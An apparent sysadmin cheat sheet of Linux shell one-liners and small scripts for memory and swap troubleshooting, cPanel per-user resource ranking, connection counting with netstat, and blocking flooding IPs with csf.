echo 3 > /proc/sys/vm/drop_caches
########################### < Memory Troubleshooting > ###########################
TOP 10 MEMORY USERS
ps auxk-rss | head -11 | cut -c1-120
MEMORY % VIA SAR
sar -r | grep -v Average | awk '{print $1" "$2" \t%"$5}'
(unset LANG ;sar -r) |awk '$3~/[0-9]/{total=$3+$2; usedbc=$3-($5+$6); pc_used=(100*usedbc)/total;print $0,pc_used} $3!~/[0-9]/{print $0}' | awk '{print $1" - "$11"%"}'
MEMORY % (RHEL 4)
sar -r | tail -n21 | head -n20 | awk '{ printf "%s -- %3.2f%%\n",$1,($3-$5-$6)*100/($3+$2)}'
DAILY MEMORY AVERAGES
sar -r | grep Average: | awk '{print $1" \t"$4"%"}'
for i in `ls -rt /var/log/sa/ | grep -E "sa[0-9][0-9]"`; do echo -ne "$i -- "; sar -r -f /var/log/sa/$i | grep -Ev "Linux|Average|RESTART|kbmemfree|^$" | awk '{ printf "%3.2f\n",($4-$6-$7)*100/($3+$4)}' | awk '{sum+=$1 } END { printf "Average = %3.2f%%\n",sum/NR}'; done
MONTHLY AVERAGES
for i in `ls /var/log/sa/ | egrep 'sa[0-9][0-9]'` ; do sar -f /var/log/sa/$i -r | grep Average | awk '{print $1" "$4"%"}' ; done
sar -r | grep -v Average | awk '{print $1" "$2" \t"$5"%"}';sar -r | grep Average: | awk '{print $1" \t"$4"%"}'
BETTER FREE REPORT
date ; free -mt ; free -m|awk 'NR==2{print "The total % of "Mem" Used: "($3*100)/$2"%"}'
MEMORY SUMMARY
vmstat -s -S M
echo -ne '\n';echo "===========================================";ps -eo user,%cpu,%mem,rsz,args|sort -rnk4|awk 'BEGIN {printf "%s\t%s\t%s\t%s\t%s\n","USER","%CPU","%MEM","RSZ","COMMAND"}{printf "%s\t%g'%'\t%g'%'\t%d MB\t%-10s\n",$1,$2,$3,$4/1024,$5}'|head -n30;echo "===========================================";echo -e "\n===========================================";vmstat -s -S M|head -n10;echo "===========================================";
CACHE CLEARING
sync; echo "2" > /proc/sys/vm/drop_caches; sleep 10; echo "0" > /proc/sys/vm/drop_caches
APACHE MEMORY USAGE
ps -eo rsz,args | grep httpd | awk ' { SUM += $1 } END { print "Memory used by Apache = "SUM/1024 " Megs" "\nNumber of process runing = " NR "\nAverage of each process mem usage = " SUM/1024/NR " Megs"} '
JAVA MEMORY USAGE
ps afux | grep java | grep -Eo "\-Xmx[0-9]+[m|g] "
More Memory Investigation
free -mt
vmstat -a -S m
ps auxk-rss |head -11
ps auxk-rss |head -11 | awk '{print $1, $4, $11}'

#Memory %
sar -r | grep -v Average | awk '{print $1" "$2" \t%"$5}'
#Memory Average %
sar -r | grep Average: | awk '{print $1" \t"$4"%"}'

#Monthly Averages
for i in `ls /var/log/sa/ | egrep 'sa[0-9][0-9]'` ; do sar -f /var/log/sa/$i -r | grep Average | awk '{print $1" "$4"%"}' ; done

sar -r | grep -v Average | awk '{print $1" "$2" \t"$5"%"}';sar -r | grep Average: | awk '{print $1" \t"$4"%"}'

date ; free -mt ; free -m|awk 'NR==2{print "The total % of "Mem" Used: "($3*100)/$2"%"}'

#Nimbus Memory %
(unset LANG ;sar -r) |awk '$3~/[0-9]/{total=$3+$2; usedbc=$3-($5+$6); pc_used=(100*usedbc)/total;print $0,pc_used} $3!~/[0-9]/{print $0}' | awk '{print $1" - "$11"%"}'

#Nimbus Memory % (RHEL 4)
sar -r | tail -n21 | head -n20 | awk '{ printf "%s -- %3.2f%%\n",$1,($3-$5-$6)*100/($3+$2)}'

#Summary
vmstat -s -S M

#More detailed overview!
slabtop
#push c to sort by highest cache user!

#Cool trick to clear cache!
[root@269179-db2 ~]# sync
[root@269179-db2 ~]# echo "2" > /proc/sys/vm/drop_caches
[root@269179-db2 ~]# sleep 10
[root@269179-db2 ~]# echo "0" > /proc/sys/vm/drop_caches

#Apache memory:
 ps -eo rsz,args | grep httpd | awk ' { SUM += $1 } END { print "Memory used by Apache = "SUM/1024 " Megs" "\nNumber of process runing = " NR "\nAverage of each process mem usage = " SUM/1024/NR " Megs"} '


low memory:
resize;clear;echo;date;echo "Top 10 Processes by MEM %"; vmstat -a -S m|tail -n1|awk \
'BEGIN {FS=" "}{printf "\nAvail\tActive\tTotal\tPercent Avail\n%sMB\t\
%sMB\t%sMB\t%s\n\n",$4+$5,$6,$4+$5+$6,($4+$5)/($4+$5+$6)*100}';ps -eo \
user,%cpu,%mem,rsz,args|sort -rnk4|awk 'BEGIN {printf "%8s %6s %6s \
%8s     %-10s\n","USER","%CPU","%MEM","RSZ","COMMAND"}{printf "%8s %6s \
%6s %8s MB  %-10s\n",$1,$2,$3,$4/1024,$5}'|head -n10; echo ""; echo "== \
Last Half Hour ==";echo; sar -r|head -n3; sar -r|tail -n4;echo; sar -B|\
head -n3; sar -B|tail -n4;echo;echo "== Current 2 Second Intervals ==";\
echo;sar -r 2 5;echo;sar -B 2 5

#Something with memory and sar
for i in `ls -rt /var/log/sa/ | grep -E "sa[0-9][0-9]"`; do echo -ne "$i -- "; sar -r -f /var/log/sa/$i | grep -Ev "Linux|Average|RESTART|kbmemfree|^$" | awk '{ printf "%3.2f\n",($4-$6-$7)*100/($3+$4)}' | awk '{sum+=$1 } END { printf "Average = %3.2f%%\n",sum/NR}'; done
Show what's using swap:
sh swapusage.sh | sort -n -k1 | tac | head -n10
#!/bin/bash
#
# show swap used by processes
#
(for PROCESS in /proc/*/; do
  swapused=$(awk 'BEGIN { total = 0 } /^Swap:[[:blank:]]*[1-9]/ { total = total + $2 } END { print total }' ${PROCESS}/smaps 2>/dev/null || echo 0)
  if [ $swapused -gt 0 ]; then
    /bin/echo -e "${swapused}k\t$(cat ${PROCESS}/cmdline)"
  fi
done ) | sort -nr
#!/bin/bash
# Get current swap usage for all running processes
# Erik Ljungstrom 27/05/2011
SUM=0
OVERALL=0
for DIR in `find /proc/ -maxdepth 1 -type d | egrep "^/proc/[0-9]"` ; do
PID=`echo $DIR | cut -d / -f 3`
PROGNAME=`ps -p $PID -o comm --no-headers`
for SWAP in `grep Swap $DIR/smaps 2>/dev/null| awk '{ print $2 }'`
do
let SUM=$SUM+$SWAP
done
echo "PID=$PID - Swap used: $SUM - ($PROGNAME )"
let OVERALL=$OVERALL+$SUM
SUM=0

done
echo "Overall swap used: $OVERALL"
Pipe through this to show only swap-using processes:
| egrep -v "Swap used: 0" |sort -n -k 5
Swap one liner:
SUM=0; OVERALL=0; for DIR in `find /proc/ -maxdepth 1 -type d | egrep "^/proc/[0-9]"` ; do PID=`echo $DIR | cut -d / -f 3

Server monitoring script :)

Script to find the most abusive users on the server

~~~~~~~~~~~

OUT=$(/usr/local/cpanel/bin/dcpumonview | grep -v Top  | sed -e 's#<[^>]*># #g' | while read i ; do NF=`echo $i | awk {'print NF'}` ; if [[ "$NF" == "5" ]] ; then USER=`echo $i | awk {'print $1'}`; OWNER=`grep -e "^OWNER=" /var/cpanel/users/$USER | cut -d= -f2` ; echo "$OWNER $i"; fi ; done) ; (echo "USER CPU" ; echo "$OUT" | sort -nrk4 | awk '{printf "%s %s%\n",$2,$4}' | head -5) | column -t ;echo;(echo -e "USER MEMORY" ; echo "$OUT" | sort -nrk5 | awk '{printf "%s %s%\n",$2,$5}' | head -5) | column -t ;echo;(echo -e "USER MYSQL" ; echo "$OUT" | sort -nrk6 | awk '{printf "%s %s%\n",$2,$6}' | head -5) | column -t ;

~~~~~~~~~~~

Finding connections to the server

netstat -pltuna | awk '$6=="LISTEN"{sub(/^.*:+/,"",$4);sub(/^[[:digit:]]+\//,"",$7);idx=sprintf("%s:%05d",$1,$4);ary[idx]=$7;} $6~"^(ESTABLISHED|SYN_RECV|FIN_WAIT2|UNKNOWN)$"{sub(/^.*:(:ffff:)?/,"",$4);sub(/:[[:digit:]]+$/,"",$5);sub(/^::ffff:/,"",$5);idx=sprintf("%s:%05d@%s",$1,$4,$5);cons[idx]++;}END{LIMITS["def"]=30;LIMITS[21]=8;LIMITS[25]=5;LIMITS[26]=5;LIMITS[465]=5;LIMITS[587]=5;CL_NML="\033[0m";CL_WTE="\033[1;37m";CL_GRN="\033[0;32m";CL_YLW="\033[1;36m";CL_RED="\033[1;5;31;22;47m";n=asorti(ary,src);for(i=1;i<=n;i++){split(src[i],meh,/:/);sub(/^0*/,"",meh[2]);print CL_WTE ary[src[i]] CL_NML " " CL_GRN "(" meh[1] ":" meh[2] ")" CL_NML ":";delete nastyhack;for (q in cons){split(q,splt,/@/);if(match(splt[1],src[i])){fmtstr=sprintf("%010d %s",cons[q],splt[2]);nastyhack[fmtstr]=fmtstr;}}r=asort(nastyhack);zerocount=match(nastyhack[r],/[^0]/);for (m=1;m<=r;m++){nastyhack[m]=substr(nastyhack[m],zerocount);split(nastyhack[m],brg,/ /);printf CL_YLW brg[1] CL_NML " ";port=meh[2];if(!(port in LIMITS)) port="def";if (brg[1]>LIMITS[port]) printf CL_RED;print brg[2] CL_NML;}}}'



Blocking Ips DDOS

~~~~~~~~~~~~

grep "Port Flood" /var/log/messages | grep "Jul 17" | awk '{ print $12 }' | cut -d = -f2 | sort | uniq -c | sort -n > /root/testflood

cat /root/testflood

while read -r number ip; do if [ "$number" -gt 500 ]; then csf -d "$ip" "Wp attack"; fi; done < /root/testflood

~~~~~~~~~~~~